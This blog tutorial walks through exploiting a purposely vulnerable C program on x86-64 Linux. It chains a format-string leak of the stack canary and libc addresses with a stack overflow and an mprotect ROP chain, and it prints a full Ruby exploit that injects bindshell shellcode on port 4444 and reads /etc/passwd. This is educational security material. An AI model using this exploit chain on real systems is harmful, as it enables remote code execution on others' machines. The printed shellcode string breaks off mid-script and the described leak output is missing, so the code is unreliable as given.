Bypassing non-executable memory, ASLR and stack canaries on x86-64 Linux

03 May 2014

This post will walk you through the exploitation of a vulnerable program on a modern x86-64 Linux system. The program was deliberately written to be vulnerable, and we will bypass modern exploit mitigation techniques like non-executable memory, ASLR and stack canaries. The motivation for doing this is to get a basic understanding of how memory corruption vulnerabilities can be exploited on x86-64 Linux systems given a memory leak and a stack-based buffer overflow.

Let's start with the vulnerable code vuln.c:

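#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define STDIN 0

void memLeak() {
    char buf[512];
    scanf("%s", buf);
    printf(buf);             /* format string vulnerability */
}

void vulnFunc() {
    char buf[1024];
    read(STDIN, buf, 2048);  /* reads up to 2048 bytes into a 1024-byte buffer */
}

int main(int argc, char* argv[]) {

    setbuf(stdout, NULL);
    printf("echo> ");
    memLeak();
    printf("read> ");
    vulnFunc();

    return 0;
}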

Compile the program with gcc -o vuln vuln.c on an x86-64 Linux system with gcc (I am using Ubuntu 12.04 LTS with gcc 4.6.3).

What does the program do? Actually not much. It will ask the user for some input. The first time it will echo it back and the second time it will just read the input. The buffers where the inputs are stored are local and therefore on the function stack. If you look at the source you will spot at least two very ugly things. First, memLeak() prints the string back by using printf(buf), which allows the user to provide format specifiers and thus leads to a format string vulnerability. Second, vulnFunc() reads up to 2048 bytes into a 1024-byte buffer on the stack, which results in a stack-based buffer overflow.

Run the program by executing nc.traditional -l -p 1234 -e ./vuln. You can then interact with it by telnet <ip address> 1234 or telnet localhost 1234 if you are on the same host.

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> hello 
read> nice

Connection closed by foreign host.

Let's try something else...

Start the vulnerable program again:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln 

This time let's input something rather unexpected:

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> %llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx
Connection closed by foreign host.

Watch the output of the vulnerable program:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln 
*** stack smashing detected ***: ./vuln terminated
Segmentation fault

Obviously something went wrong here. The program did not echo back the string we typed and instead of normal termination it segfaulted.

Because of the unsafe use of printf() we were able to provide a string with format specifiers %llx i.e. a format string. The format string we provided instructed printf() to print its 8 byte integer "arguments" as hexadecimal values. Yes, printf() will just assume that memLeak() passed some "arguments" along and it will trust the format string and its format specifiers. The values printed are values that printf() finds at the locations it would normally expect arguments. In x86 32bit this would have been the stack (see here). In x86-64 the first six integer arguments are passed in registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9) and the remaining arguments on the stack. Because printf() actually gets one real argument namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments within the remaining registers and everything else on the stack. This is what we actually see in the output echoed back to us. 1 is the content of %rsi and 7ff78e041ac0 was in %rdx right before printf() was called. 6c6c252c786c6c25 thus are the first 8 bytes on the stack. As it's little endian the LSB is 0x25 which corresponds to the character % in ASCII. This is the first character in our input that now resides on the stack. By providing more format specifiers we are now able to read out the process stack.
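To check the claim that 6c6c252c786c6c25 is the start of our own input, the leaked value can be turned back into the bytes as they sit in memory. This is a minimal Ruby sketch; the helper name leaked_qword_to_bytes is made up for illustration and is not part of the exploit.

```ruby
# Decode one value printed by %llx into the 8 bytes as they are laid out
# in memory. The helper name is illustrative only.
def leaked_qword_to_bytes(hex)
  # 'Q<' packs a 64-bit unsigned integer in little-endian byte order,
  # which is how x86-64 stores it on the stack.
  [hex.to_i(16)].pack('Q<')
end

puts leaked_qword_to_bytes('6c6c252c786c6c25') # prints %llx,%ll
```

The lowest byte 0x25 comes out first, so the decoded string is the first eight characters of the format string we typed.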

But why did the program segfault? Actually, the segfault was due to a detected stack overflow.

0000000000400794 <vulnFunc>:
  400794:   55                      push   %rbp
  400795:   48 89 e5                mov    %rsp,%rbp
  400798:   48 81 ec 10 04 00 00    sub    $0x410,%rsp
  40079f:   64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
  4007a6:   00 00 
  4007a8:   48 89 45 f8             mov    %rax,-0x8(%rbp)
  4007ac:   31 c0                   xor    %eax,%eax
  4007ae:   48 8d 85 f0 fb ff ff    lea    -0x410(%rbp),%rax
  4007b5:   ba 00 08 00 00          mov    $0x800,%edx
  4007ba:   48 89 c6                mov    %rax,%rsi
  4007bd:   bf 00 00 00 00          mov    $0x0,%edi
  4007c2:   b8 00 00 00 00          mov    $0x0,%eax
  4007c7:   e8 54 fe ff ff          callq  400620 <read@plt>
  4007cc:   48 8b 45 f8             mov    -0x8(%rbp),%rax
  4007d0:   64 48 33 04 25 28 00    xor    %fs:0x28,%rax
  4007d7:   00 00 
  4007d9:   74 05                   je     4007e0 <vulnFunc+0x4c>
  4007db:   e8 10 fe ff ff          callq  4005f0 <__stack_chk_fail@plt>
  4007e0:   c9                      leaveq 
  4007e1:   c3                      retq

Let's have a look at the vulnFunc() x86-64 machine code. You can disassemble the ELF executable with objdump (objdump -d vuln). When we look at the function prologue we will notice mov %fs:0x28,%rax and mov %rax,-0x8(%rbp). This moves a 64 bit value from %fs:0x28 to %rax and then from %rax to the 8 bytes right below the base pointer %rbp. This value is called the stack canary and it is random for each process. For more on how this stack canary mechanism is implemented see this blog post (x86-64 should be similar). The value will thus change for each program invocation but it remains the same for every function that uses stack canaries. Gcc decides for each function, based on certain criteria, whether it will emit stack canaries or not (you can disable it with -fno-stack-protector). There is also -fstack-protector-all to enable it for all functions. gcc 4.9 introduces a new option -fstack-protector-strong which enables stack canaries for more functions, see this blog post for more details.

So what is the purpose of this canary value? As it's placed right at the beginning of the new function stack and therefore before any other local buffer, in case a local buffer overflows this value will be overwritten. Verifying if the value changed at function exit will indicate if a buffer overflowed. The stack canary is verified at 4007cc - 4007db before function exit and in case the value changed __stack_chk_fail is called. This function resides within libc and somewhere down the __stack_chk_fail road a segfault happens.
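The check can be modelled in a few lines of Ruby. This is only a toy simulation under simplifying assumptions: the frame is a byte string holding the buffer followed by the canary, and the names run_frame and BUF_TO_CANARY are invented for this sketch. Like the epilogue of vulnFunc(), it XORs the stored value with the reference value and takes the failure path if the result is not zero.

```ruby
# Distance from the start of buf to the canary in vulnFunc():
# buf is at rbp - 0x410, the canary at rbp - 0x8.
BUF_TO_CANARY = 0x410 - 0x8

# Toy model: copy `input` into a frame without a bounds check, then do
# what the epilogue does (xor the stored canary with the reference value).
def run_frame(input, canary)
  frame = "\x00".b * BUF_TO_CANARY + [canary].pack('Q<')
  data  = input.b
  n     = [data.bytesize, frame.bytesize].min
  frame[0, n] = data[0, n]
  stored = frame[BUF_TO_CANARY, 8].unpack('Q<').first
  (stored ^ canary).zero? ? :return_normally : :stack_chk_fail
end

canary = 0xe4437cc224112800
puts run_frame('A' * 100, canary)                              # fits into buf
puts run_frame('A' * 1040, canary)                             # clobbers the canary
puts run_frame('A' * 1032 + [canary].pack('Q<'), canary)       # rewrites the same value
```

The third call shows why a leaked canary defeats the check: an overflow that writes the original value back at the right offset is indistinguishable from no overflow.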

The stack canary will therefore indicate if a buffer overflow occurred on the function stack. Of course overflows affecting only local buffers (not reaching the canary value) will not be detected by this. The most sensitive value usually protected by a stack canary is the return instruction pointer that resides right after the %rbp value pushed at the beginning of the function. Since a call instruction pushes the return address onto the stack right before transferring control to the function, this value resides on the stack followed by %rbp, the stack canary and the local buffers and variables. Read Aleph One's Smashing The Stack For Fun And Profit for a basic introduction (and more) on stack based buffer overflows (note: the article was written before stack canaries were introduced).

If you step through the vulnerable program with gdb you can print the stack canary (e.g. 0xe4437cc224112800) right after mov %fs:0x28,%rax by printing $rax (gdb's name for the %rax register). As mentioned this will change for each program invocation but stays the same throughout function calls.

Now, how can these vulnerabilities be exploited remotely and reliably such that we gain arbitrary code execution?

To hijack the control flow we need to overwrite some function pointer (64 bit value) that is used as an indirect branch target (call*, jmp* or ret). The stack overflow would allow us to overwrite the return address on the stack but we need to bypass the stack canary protection or we end up in __stack_chk_fail. Since we are able to read the stack we can of course read out the stack canary on the memLeak() stack. This value is the same as the one for vulnFunc() so we can "bypass" the stack canary check by just writing the right value as we overflow the buffer. We have to make sure that the stack canary value is written to the exact same place on the stack where it was put before.
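Where exactly the canary has to go follows from the vulnFunc() disassembly. The following Ruby sketch just does the arithmetic; the constant and method names are invented for illustration.

```ruby
# Offsets inside vulnFunc()'s frame, taken from the disassembly:
#   lea -0x410(%rbp),%rax   -> buf starts at rbp - 0x410
#   mov %rax,-0x8(%rbp)     -> the canary lives at rbp - 0x8
BUF_FROM_RBP    = 0x410
CANARY_FROM_RBP = 0x8

def vuln_frame_offsets
  canary    = BUF_FROM_RBP - CANARY_FROM_RBP # bytes from buf[0] to the canary
  saved_rbp = canary + 8                     # saved %rbp follows the canary
  ret_addr  = saved_rbp + 8                  # return address follows saved %rbp
  { canary: canary, saved_rbp: saved_rbp, ret_addr: ret_addr }
end

vuln_frame_offsets.each do |name, off|
  puts format('%-9s at buf + %d (0x%x)', name, off, off)
end
```

So the overflow has to carry 1032 bytes of filler, then the 8-byte canary, then 8 bytes for the saved %rbp, and only then the new return address. All of that fits easily into the 2048 bytes that read() accepts.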

Next, with which value should we overwrite the return address on the stack? Before non-executable memory was introduced you could place the code onto the stack and return to it. As the stack is non-executable this will not work. But we have plenty of other instructions that are mapped as executable memory, for instance the executable code of the program itself or its shared libraries.

We will place the code we would like to execute onto the stack (into buf[1024]) through the read in vulnFunc() and we will use already executable code within the process' address space to make the stack executable again. After that we will transfer control to the code on the stack. This is also called return-oriented programming (ROP) or a ret2libc/ret2mprotect attack (see here or here for more on this topic).

Changing protection flags of memory mappings can be done by mprotect(). You find mprotect() within the libc and it's actually just a system call wrapper. On x86-64 Linux the syscall number is 0xa (x86-64 Linux syscalls).

See man mprotect for the details:

int mprotect(const void *addr, size_t len, int prot);

addr is a page-aligned address indicating the start of the memory area that should get the new protection flags, len is the size of the memory area and prot are the new protection flags.
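As a small worked example of these three arguments, the Ruby sketch below rounds a buffer address down to its page and combines the protection flags. The PROT_* values are the ones Linux uses; the method name mprotect_args and the sample address are assumptions made for this illustration.

```ruby
PAGE_SIZE  = 4096
PROT_READ  = 0x1
PROT_WRITE = 0x2
PROT_EXEC  = 0x4

# Compute the (addr, len, prot) triple for making the page that contains
# `bufaddr` readable, writable and executable.
def mprotect_args(bufaddr)
  addr = bufaddr & ~(PAGE_SIZE - 1) # clear the low 12 bits -> page start
  [addr, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC]
end

addr, len, prot = mprotect_args(0x7fff5a3c2600) # hypothetical stack address
puts format('addr=0x%x len=%d prot=0x%x', addr, len, prot)
```

Note that a single page only covers the bytes from the page start up to the next 4096-byte boundary, so code placed in the buffer must lie inside the page that contains the buffer start, or len has to be increased.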

Before transferring control to our code placed on the stack we need to call mprotect with the appropriate arguments to make the stack executable and we can then redirect control-flow to the stack where our executable code resides. We still have two issues to solve. First, how do we know the exact addresses of mprotect and the buffer (buf[1024]) on the stack where our code will be placed? Second, how can we actually call mprotect() with the appropriate arguments?

If we use 71 %llx format specifiers the vulnerable program will leak 568 bytes: 40 bytes from registers (%rsi, %rdx, %rcx, %r8, %r9; %rdi holds the pointer to the format string itself) and 528 bytes from the stack. If we look at the disassembled memLeak() function we will notice sub $0x210,%rsp.

0000000000400734 <memLeak>:
  400734:   55                      push   %rbp
  400735:   48 89 e5                mov    %rsp,%rbp
  400738:   48 81 ec 10 02 00 00    sub    $0x210,%rsp
  40073f:   64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
  400746:   00 00 
  400748:   48 89 45 f8             mov    %rax,-0x8(%rbp)
  40074c:   31 c0                   xor    %eax,%eax
  40074e:   b8 4c 09 40 00          mov    $0x40094c,%eax
  400753:   48 8d 95 f0 fd ff ff    lea    -0x210(%rbp),%rdx
  40075a:   48 89 d6                mov    %rdx,%rsi
  40075d:   48 89 c7                mov    %rax,%rdi
  400760:   b8 00 00 00 00          mov    $0x0,%eax
  400765:   e8 d6 fe ff ff          callq  400640 <__isoc99_scanf@plt>
  40076a:   48 8d 85 f0 fd ff ff    lea    -0x210(%rbp),%rax
  400771:   48 89 c7                mov    %rax,%rdi
  400774:   b8 00 00 00 00          mov    $0x0,%eax
  400779:   e8 92 fe ff ff          callq  400610 <printf@plt>
  40077e:   48 8b 45 f8             mov    -0x8(%rbp),%rax
  400782:   64 48 33 04 25 28 00    xor    %fs:0x28,%rax
  400789:   00 00 
  40078b:   74 05                   je     400792 <memLeak+0x5e>
  40078d:   e8 5e fe ff ff          callq  4005f0 <__stack_chk_fail@plt>
  400792:   c9                      leaveq 
  400793:   c3                      retq

0x210 is exactly 528 bytes so we actually leaked the entire memLeak() stack frame. With two more format specifiers we would also see the saved %rbp value and the return address on the stack. But these 40 + 528 bytes are actually enough to derive all the information we need!
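The numbers can be double-checked with a few lines of Ruby. This is just the arithmetic from the text; the names are made up for the sketch.

```ruby
QWORD         = 8
REGISTER_ARGS = %w[rsi rdx rcx r8 r9] # %rdi carries the format string itself
FRAME_SIZE    = 0x210                 # from "sub $0x210,%rsp" in memLeak()

# How many bytes a given number of %llx specifiers leaks, and from where.
def leak_layout(specifiers)
  from_stack = specifiers - REGISTER_ARGS.size
  {
    total_bytes:    specifiers * QWORD,
    register_bytes: REGISTER_ARGS.size * QWORD,
    stack_bytes:    from_stack * QWORD
  }
end

# Which specifier (1-based) prints the canary stored at rbp - 8,
# i.e. at rsp + FRAME_SIZE - 8.
def canary_specifier
  REGISTER_ARGS.size + (FRAME_SIZE - QWORD) / QWORD + 1
end

p leak_layout(71)
puts canary_specifier
```

With 71 specifiers the stack part is exactly FRAME_SIZE bytes, and the last value printed is the canary.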

If we send 71 comma-separated %llx specifiers you will see:

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> %llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx

The 71st value 5fea3d5e1f0d9300 is actually the stack canary. What's interesting is that the LSB of the stack canary is 0x00. This makes it more difficult to misuse string functions to overflow the stack because string functions terminate when a null byte 0x00 is encountered.

The 2nd value is an address pointing into the libc mapped within the process' address space. The offset of this value to the libc base address will remain the same across different program invocations. In my case the offset is 0x3bbac0.

The 62nd value points to the stack. Again, the offset to buf[1024] of vulnFunc() will stay the same across different invocations. In my case it's 0x510.
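Turning one leaked line into the three values we need could look like the Ruby sketch below. The offsets are the ones from my system quoted above. The sample line is synthetic: it reuses the libc pointer and the canary mentioned in the text (which stem from different runs), and the stack pointer 7fff5a3c2b10 is invented for the example.

```ruby
LIBC_LEAK_OFFSET  = 0x3bbac0 # 2nd leaked value minus libc base (system specific)
STACK_LEAK_OFFSET = 0x510    # 62nd leaked value minus address of buf[1024]

# Parse the comma-separated hex values echoed back by memLeak().
def parse_leak(line)
  values = line.strip.split(',').map { |v| v.to_i(16) }
  {
    cookie:   values[70],                    # 71st value
    libcbase: values[1] - LIBC_LEAK_OFFSET,  # 2nd value
    bufaddr:  values[61] - STACK_LEAK_OFFSET # 62nd value
  }
end

# Synthetic leak: only the three interesting positions are filled in.
def sample_leak
  fake = Array.new(71, '0')
  fake[1]  = '7ff78e041ac0'
  fake[61] = '7fff5a3c2b10' # made-up stack pointer
  fake[70] = '5fea3d5e1f0d9300'
  fake.join(',')
end

parse_leak(sample_leak).each { |name, v| puts format('%-8s = 0x%x', name, v) }
```

A quick sanity check on real data is that the computed libc base ends in 000 (it is page aligned) and that the lowest byte of the canary is 00.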

We now have almost everything required for successful exploitation. One last issue remains, namely how to call mprotect() with the appropriate arguments. In x86 32bit we would have placed the arguments for mprotect on the stack. But on x86-64 the parameters are passed to mprotect in %rdi, %rsi and %rdx. We therefore need a way to fill these registers with the appropriate values without losing control flow. Ideally, we find a sequence that pops these values into the registers and returns again to an address on the stack. These short instruction sequences ending with an indirect control flow instruction (like ret) are called gadgets. As we have the base of libc we will try to find appropriate gadgets within libc. You can use e.g. rp++, a ROP sequence finder, or just plain objdump to find such gadgets.

These are the gadgets I found in libc:

  pop %rdi; ret; // at 0x229f2
  pop %rsi; ret; // at 0x23d25
  pop %rdx; ret; // at 0x102105
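Each of these gadgets is only two bytes long (a one-byte pop followed by ret, 0xc3), so a naive search is easy to sketch in Ruby. The sample bytes below are hand-made and not taken from a real libc, and find_gadgets is a name invented for this illustration; tools like rp++ do this far more thoroughly.

```ruby
# Byte encodings of the three gadgets.
GADGET_BYTES = {
  'pop %rdi; ret' => "\x5f\xc3".b,
  'pop %rsi; ret' => "\x5e\xc3".b,
  'pop %rdx; ret' => "\x5a\xc3".b
}

# Return the offset of the first occurrence of each gadget in a blob of
# code bytes, or nil if the gadget does not occur.
def find_gadgets(code)
  blob = code.b
  GADGET_BYTES.each_with_object({}) do |(name, bytes), found|
    found[name] = blob.index(bytes)
  end
end

# Hand-made sample bytes, NOT from a real libc.
SAMPLE_CODE = "\x90\x90\x5a\xc3\x48\x89\xe5\x5f\xc3\x5e\xc3".b

find_gadgets(SAMPLE_CODE).each do |name, offset|
  puts format('%s at offset 0x%x', name, offset)
end
```

Because the search works on raw bytes, a hit does not have to start at an instruction boundary of the original code. Adding the file offset of the executable segment and the libc base then gives the runtime address.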

That's it! This should give us remote code execution. After leaking all the data we need, we have to construct a payload with the following structure (listed from the highest address down to the start of the buffer, where the shellcode sits):

[ bufaddr      ] -> address of the beginning of this buffer mprotect should return to
[ &mprotect    ] -> address of mprotect the third gadget should return to
[ prot arg     ] -> prot arg to be put into %rdx
[ &gadget3     ] -> the third gadget the second should return to (pop %rdx; ret;)
[ size arg     ] -> size arg to be put into %rsi
[ &gadget2     ] -> the second gadget the first should return to (pop %rsi; ret;)
[ addr arg     ] -> addr arg to be put into %rdi
[ &gadget1     ] -> the first gadget vulnFunc() should return to (pop %rdi; ret;)
[ rbp          ] -> value for rbp
[ stack canary ] -> the stack canary leaked
[ padding      ] -> some nop padding
[ shellcode    ] -> our shellcode, will be made executable by mprotect

The address of the first gadget is placed where vulnFunc()'s return address resides. The stack canary validation will succeed because we overwrite the canary with the exact same value. After the gadget chain has run, the registers contain the right arguments for mprotect, which makes our injected code (shellcode) executable. In the last step, mprotect's return instruction transfers control to our shellcode.
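The layout above can be sketched in Ruby as follows. Everything here is a placeholder: the 16 bytes of 0xcc stand in for real shellcode, the addresses are invented, and build_payload is a name made up for this illustration. The point is only the order and the offsets of the fields.

```ruby
BUF_TO_CANARY = 1032 # 0x410 - 8, distance from buf[0] to the canary

# shellcode + nop padding up to the canary, then canary, saved rbp and
# the chain of 64-bit little-endian values.
def build_payload(shellcode, cookie, rbp, chain)
  padding = "\x90".b * (BUF_TO_CANARY - shellcode.bytesize)
  shellcode.b + padding + ([cookie, rbp] + chain).pack('Q<*')
end

# Placeholder values only; real ones come from the leak and from your libc.
def demo_payload
  stub     = "\xcc".b * 16
  bufaddr  = 0x7fff5a3c2600
  libcbase = 0x7ff78dc86000
  chain = [
    libcbase + 0x229f2,  bufaddr & ~0xfff,  # pop %rdi; ret  + addr arg
    libcbase + 0x23d25,  4096,              # pop %rsi; ret  + size arg
    libcbase + 0x102105, 0x1 | 0x2 | 0x4,   # pop %rdx; ret  + prot arg
    libcbase + 0xf0800,                     # mprotect
    bufaddr                                 # mprotect returns into the buffer
  ]
  build_payload(stub, 0x5fea3d5e1f0d9300, bufaddr + 0x430, chain)
end

payload = demo_payload
puts payload.bytesize
puts format('0x%x', payload.byteslice(BUF_TO_CANARY, 8).unpack('Q<').first)
```

The payload is 1032 + 10 * 8 = 1112 bytes long, well within the 2048 bytes read by vulnFunc(), and the canary ends up exactly at offset 1032.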

The shellcode i.e. the code we inject into the stack will listen on port 4444 on the vulnerable host and provide us a shell after connecting to it (I took the shellcode from here).

Let's try it. Execute the vulnerable program:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln

Exploit the vulnerability (the complete exploit is found further down):

user@host:~$ nc.traditional -c ./exploit.rb localhost 1234

We should now have a bindshell at port 4444. Connect to it:

user@host:~$ telnet localhost 4444
Connected to localhost.
Escape character is '^]'.
ls /;
: not found 
cat /etc/passwd;
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
: not found 

It worked! We gained arbitrary code execution. Here is the complete exploit.rb:


require 'open3'
include Open3

# shellcode from
# bindshell on port 4444
shellcode =
"\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" +
"\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" +
"\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" +
"\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" +
"\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" +
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" +
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" +
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" +

popen3('./vuln') do
  |stdin, stdout, stderr|

  stdin.sync = true
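  line = stdout.read(6) # read the "echo> " prompt (6 bytes, no newline)
  puts line

  # leak registers and stack with 71 comma-separated %llx specifiers
  stdin.puts((['%llx'] * 71).join(','))
  memleak = stdout.readline
  puts memleak

  line = stdout.read(6) # read the "read> " prompt
  puts line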

  # get the required values from the leaked memory
  # * 71st value is the canary on the stack
  # * 2nd value is an address that points to the
  #   libcbase + some offset (0x3bbac0)
  # * 62nd value points into the stack with an offset
  #   (0x510) relative to the buffer in vulnFunc later overflowed
  cookie = memleak.split(',')[70].to_i(16) # 71st value / index 70
  libcbase = memleak.split(',')[1].to_i(16) - 0x3bbac0 # 2nd value / index 1
  bufaddr = memleak.split(',')[61].to_i(16) - 0x510 # 62nd value / index 61

  ebp = bufaddr + 0x430 # we will overwrite the %rbp value on the stack as well
  mprotect = libcbase + 0xf0800; # mprotect offset in libc
  gadget1 = libcbase + 0x229f2; # pop %rdi; ret;
  gadget2 = libcbase + 0x23d25 # pop %rsi; ret;
  gadget3 = libcbase + 0x102105; # pop %rdx; ret;

  aligned_bufaddr = bufaddr & 0xfffffffffffff000; # align to page boundary
  size = 4096; # page size
  prot = 0x1|0x2|0x4; # what do we want? RWX!

  # "lea    -0x410(%rbp),%rax" -> 0x410 = 1040 - 8 (canary) = 1032
  padding = "\x90" * (1032-shellcode.bytesize) # nop padding of remaining buf 

  puts "\n"
  puts " * exploit"
  puts "  * cookie = " + cookie.to_s(16)
  puts "  * libcbase = " + libcbase.to_s(16) 
  puts "   * mprotect = " + mprotect.to_s(16) 
  puts "   * gadget1 = " + gadget1.to_s(16) 
  puts "   * gadget2 = " + gadget2.to_s(16) 
  puts "   * gadget3 = " + gadget3.to_s(16) 
  puts "  * bufaddr = " + bufaddr.to_s(16)
  puts " * sending/writing payload..."

  # write the actual payload
  # [bufaddr (containing the payload)]
  # [&mprotect]
  # [prot arg for mprotect]
  # [&gadget3]
  # [size arg for mprotect]
  # [&gadget2]
  # [addr arg for mprotect]
  # [&gadget1]
  # [rbp]
  # [stack canary]
  # [ ... shellcode padding ... ]
  # [shellcode]

  stdin.write(shellcode + padding +
   [cookie].pack('Q').to_s() +
   [ebp].pack('Q').to_s() +
   [gadget1].pack('Q').to_s() +
   [aligned_bufaddr].pack('Q').to_s() +
   [gadget2].pack('Q').to_s() +
   [size].pack('Q').to_s() +
   [gadget3].pack('Q').to_s() +
   [prot].pack('Q').to_s() +
   [mprotect].pack('Q').to_s() +
   [bufaddr].pack('Q').to_s())

  puts "\n"
end

You need to adapt certain offsets to match your system and libc. The ones provided above work for Ubuntu 12.04 LTS.

Well, that's it. We managed to bypass all exploit mitigation techniques currently deployed on modern standard x86-64 Linux systems. What we achieved is arbitrary code execution in the context of the vulnerable program. Depending on the privileges of the process we would also need to elevate our privileges to get full system control.

Memory corruption vulnerabilities are still a problem today. Although reliable exploitation got much more difficult it is still possible under certain circumstances. With the wide deployment of non-executable memory (DEP on Windows) and ASLR (full or partial) memory leaks are essential for reliable exploitation.

So what could be further done to harden software systems against the exploitation of memory corruption vulnerabilities?

Besides not using unsafe languages unless really required, you should of course try to write safe code and verify your code statically and dynamically.

Other interesting compile-time techniques are SoftBound + CETS or Control-Flow Integrity (CFI) policies.

I hope you enjoyed reading this blog post!